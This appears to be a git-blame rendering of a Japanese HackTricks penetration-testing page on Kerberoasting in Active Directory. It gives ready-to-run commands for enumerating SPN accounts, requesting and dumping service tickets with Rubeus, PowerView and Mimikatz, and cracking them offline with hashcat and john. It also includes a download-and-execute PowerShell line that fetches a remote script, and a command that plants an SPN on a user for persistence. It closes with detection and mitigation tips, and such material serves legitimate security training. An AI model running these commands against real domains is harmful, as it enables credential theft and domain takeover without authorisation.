2023-07-07 23:42:27 +00:00
|
|
|
|
# Kerberoast(Kerberoast)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2022-09-30 10:43:59 +00:00
|
|
|
|
![](<../../.gitbook/assets/image (9) (1) (2).png>)
|
2022-08-31 22:35:39 +00:00
|
|
|
|
|
|
|
|
|
\
|
2023-07-07 23:42:27 +00:00
|
|
|
|
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築**し、自動化します。\
|
|
|
|
|
今すぐアクセスを取得:
|
2022-08-31 22:35:39 +00:00
|
|
|
|
|
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
|
|
|
|
|
2022-04-28 16:01:33 +00:00
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手**したいですか?または、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
|
|
|
|
* [**公式のPEASS&HackTricks swag**](https://peass.creator-spring.com)を手に入れましょう。
|
|
|
|
|
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## Kerberoast(Kerberoast)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**Kerberoasting(Kerberoast)**の目的は、ADでユーザーアカウントの代わりに実行されるサービスのために実行される**TGSチケットを収集する**ことです。したがって、これらのTGSチケットの一部は、ユーザーパスワードから派生したキーで**暗号化**されています。その結果、その資格情報はオフラインで**クラック**される可能性があります。\
|
|
|
|
|
ユーザーアカウントがサービスとして使用されていることを知ることができるのは、プロパティ**"ServicePrincipalName"**が**nullでない**場合です。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
したがって、Kerberoastingを実行するには、特権は必要ありませんので、TGSを要求できるドメインアカウントのみが必要です。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**有効なドメイン内の資格情報が必要です。**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### **攻撃**
|
2022-10-05 00:36:34 +00:00
|
|
|
|
|
|
|
|
|
{% hint style="warning" %}
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**Kerberoastingツール**は、攻撃を実行し、TGS-REQリクエストを開始する際に、通常**`RC4暗号化`**を要求します。これは、**RC4が**[**弱い**](https://www.stigviewer.com/stig/windows\_10/2017-04-28/finding/V-63795)ためであり、Hashcatなどのツールを使用してオフラインで他の暗号化アルゴリズム(AES-128やAES-256など)よりも簡単にクラックできます。\
|
|
|
|
|
RC4(タイプ23)ハッシュは**`$krb5tgs$23$*`**で始まり、AES-256(タイプ18)は**`$krb5tgs$18$*`**で始まります。`
|
2022-10-05 00:36:34 +00:00
|
|
|
|
{% endhint %}
|
|
|
|
|
|
|
|
|
|
#### **Linux**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
msf> use auxiliary/gather/get_user_spns
|
|
|
|
|
GetUserSPNs.py -request -dc-ip 192.168.2.160 <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
|
|
|
|
|
GetUserSPNs.py -request -dc-ip 192.168.2.160 -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
|
|
|
|
|
```
|
2022-10-05 00:36:34 +00:00
|
|
|
|
#### Windows
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
* **Kerberoast可能なユーザーの列挙**
|
2022-10-05 00:36:34 +00:00
|
|
|
|
```powershell
|
|
|
|
|
# Get Kerberoastable users
|
|
|
|
|
setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
|
|
|
|
|
Get-NetUser -SPN | select serviceprincipalname #Powerview
|
2022-10-10 23:25:09 +00:00
|
|
|
|
.\Rubeus.exe kerberoast /stats
|
2022-10-05 00:36:34 +00:00
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
* **テクニック1: TGSを要求し、メモリからダンプする**
|
2022-10-05 00:36:34 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
このテクニックでは、攻撃者はKerberosチケットグラントサービス(TGS)を要求し、メモリからダンプします。
|
2022-10-05 00:36:34 +00:00
|
|
|
|
```powershell
|
|
|
|
|
#Get TGS in memory from a single user
|
2023-07-07 23:42:27 +00:00
|
|
|
|
Add-Type -AssemblyName System.IdentityModel
|
|
|
|
|
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/mgmt.domain.local
|
2022-10-05 00:36:34 +00:00
|
|
|
|
|
|
|
|
|
#Get TGSs for ALL kerberoastable accounts (PCs included, not really smart)
|
|
|
|
|
setspn.exe -T DOMAIN_NAME.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
|
|
|
|
|
|
|
|
|
|
#List kerberos tickets in memory
|
|
|
|
|
klist
|
|
|
|
|
|
|
|
|
|
# Extract them from memory
|
2020-07-15 15:43:14 +00:00
|
|
|
|
Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current folder
|
2022-10-05 00:36:34 +00:00
|
|
|
|
|
|
|
|
|
# Transform kirbi ticket to john
|
|
|
|
|
python2.7 kirbi2john.py sqldev.kirbi
|
|
|
|
|
# Transform john to hashcat
|
|
|
|
|
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
* **テクニック2: 自動ツール**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
2022-10-05 00:36:34 +00:00
|
|
|
|
# Powerview: Get Kerberoast hash of a user
|
|
|
|
|
Request-SPNTicket -SPN "<SPN>" -Format Hashcat #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
|
|
|
|
|
# Powerview: Get all Kerberoast hashes
|
|
|
|
|
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation
|
2022-08-15 13:00:19 +00:00
|
|
|
|
|
|
|
|
|
# Rubeus
|
2020-07-15 15:43:14 +00:00
|
|
|
|
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
|
2022-08-15 13:00:19 +00:00
|
|
|
|
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user
|
2022-10-05 00:36:34 +00:00
|
|
|
|
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap #Get of admins
|
2022-08-15 13:00:19 +00:00
|
|
|
|
|
|
|
|
|
# Invoke-Kerberoast
|
2020-07-15 15:43:14 +00:00
|
|
|
|
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
|
|
|
|
|
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
|
|
|
|
|
```
|
2022-08-15 13:00:19 +00:00
|
|
|
|
{% hint style="warning" %}
|
2023-07-07 23:42:27 +00:00
|
|
|
|
TGSが要求されると、Windowsイベント`4769 - Kerberosサービスチケットが要求されました`が生成されます。
|
2022-08-15 13:00:19 +00:00
|
|
|
|
{% endhint %}
|
|
|
|
|
|
2022-10-05 00:36:34 +00:00
|
|
|
|
|
|
|
|
|
|
2022-09-30 10:43:59 +00:00
|
|
|
|
![](<../../.gitbook/assets/image (9) (1) (2).png>)
|
2022-08-31 22:35:39 +00:00
|
|
|
|
|
|
|
|
|
\
|
2023-07-07 23:42:27 +00:00
|
|
|
|
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築**し、自動化することができます。\
|
|
|
|
|
今すぐアクセスを取得:
|
2022-08-31 22:35:39 +00:00
|
|
|
|
|
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### クラッキング
|
2022-10-05 00:36:34 +00:00
|
|
|
|
```bash
|
2020-07-15 15:43:14 +00:00
|
|
|
|
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
|
|
|
|
|
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
|
|
|
|
|
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### 持続性
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
ユーザーに対して**十分な権限**がある場合、それを**kerberoastable**にすることができます。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
2023-07-07 23:42:27 +00:00
|
|
|
|
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
以下は、**kerberoast** 攻撃に役立つ**ツール**のリンクです: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
|
|
|
|
|
|
|
|
|
|
もしLinuxで次の**エラー**が表示された場合: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** それはローカルの時刻のずれが原因です。ホストとドメインコントローラーを同期する必要があります。いくつかのオプションがあります:
|
|
|
|
|
- `ntpdate <ドメインコントローラーのIP>` - Ubuntu 16.04以降では非推奨
|
|
|
|
|
- `rdate -n <ドメインコントローラーのIP>`
|
|
|
|
|
|
|
|
|
|
### 緩和策
|
|
|
|
|
|
|
|
|
|
Kerberoast は、攻撃可能な場合に非常に潜在的です。
|
|
|
|
|
|
|
|
|
|
* セキュリティイベントID 4769 – Kerberosチケットが要求されました
|
|
|
|
|
* 4769は非常に頻繁なので、結果をフィルタリングしましょう:
|
|
|
|
|
* サービス名はkrbtgtではないこと
|
|
|
|
|
* サービス名は$で終わらないこと(サービス用のマシンアカウントをフィルタリングするため)
|
|
|
|
|
* アカウント名はmachine@domainではないこと(マシンからの要求をフィルタリングするため)
|
|
|
|
|
* 失敗コードは '0x0' であること(失敗をフィルタリングするため、0x0は成功)
|
|
|
|
|
* 最も重要なのは、チケットの暗号化タイプが0x17であることです
|
|
|
|
|
* 緩和策:
|
|
|
|
|
* サービスアカウントのパスワードは推測しにくいものにする(25文字以上)
|
|
|
|
|
* 管理されたサービスアカウントを使用する(定期的なパスワードの自動変更とSPNの委任管理)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**[ここ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**と**[ここ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**で、ired.teamのKerberoastingに関する詳細情報を見ることができます。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
|
|
|
|
* [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
|
|
|
|
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
|
|
|
|
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
2022-08-31 22:35:39 +00:00
|
|
|
|
|
2022-09-30 10:43:59 +00:00
|
|
|
|
![](<../../.gitbook/assets/image (9) (1) (2).png>)
|
2022-08-31 22:35:39 +00:00
|
|
|
|
|
|
|
|
|
\
|
2023-07-07 23:42:27 +00:00
|
|
|
|
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築および自動化**できます。\
|
|
|
|
|
今すぐアクセスを取得:
|
2022-08-31 22:35:39 +00:00
|
|
|
|
|
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|